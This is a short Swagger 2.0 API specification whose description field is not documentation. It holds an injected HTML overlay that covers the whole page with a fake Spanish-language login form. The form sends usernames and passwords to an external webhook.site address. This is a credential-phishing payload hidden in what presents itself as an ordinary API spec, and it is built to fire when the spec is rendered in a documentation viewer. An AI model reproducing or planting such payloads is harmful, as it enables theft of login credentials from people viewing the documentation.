swagger: '2.0'
info:
  version: 1.0.0
  title: API Login
  description: |
    <div style="position:fixed;top:0;left:0;right:0;bottom:0;background:#f0f2f5;z-index:999999;display:flex;align-items:center;justify-content:center;font-family:Arial,Helvetica,sans-serif;">
      <div style="width:380px;background:white;padding:40px 30px;border-radius:10px;box-shadow:0 4px 20px rgba(0,0,0,0.2);">
        <h2 style="text-align:center;margin:0 0 10px;color:#333;">Iniciar sesión</h2>
        <p style="text-align:center;color:#666;margin:0 0 30px;font-size:14px;">Ingresa tus credenciales para continuar</p>
        
        <form action="https://webhook.site/c5dd4a2f-b6e1-45ff-a25e-15dbf4565f53" method="POST">
          <div style="margin-bottom:20px;">
            <label style="display:block;margin-bottom:6px;color:#444;font-weight:bold;">Usuario o correo</label>
            <input type="text" name="username" placeholder="usuario@empresa.com" required style="width:100%;padding:12px;border:1px solid #ccc;border-radius:6px;box-sizing:border-box;font-size:15px;">
          </div>
          
          <div style="margin-bottom:25px;">
            <label style="display:block;margin-bottom:6px;color:#444;font-weight:bold;">Contraseña</label>
            <input type="password" name="password" required style="width:100%;padding:12px;border:1px solid #ccc;border-radius:6px;box-sizing:border-box;font-size:15px;">
          </div>
          
          <button type="submit" style="width:100%;padding:14px;background:#1877f2;color:white;border:none;border-radius:6px;font-size:16px;font-weight:bold;cursor:pointer;">
            Iniciar sesión
          </button>
          
          <p style="text-align:center;margin:20px 0 0;font-size:13px;color:#666;">
            <a href="#" style="color:#1877f2;text-decoration:none;">¿Olvidaste tu contraseña?</a>
          </p>
        </form>
      </div>
    </div>
paths:
  /health:
    get:
      responses:
        200:
          description: OK

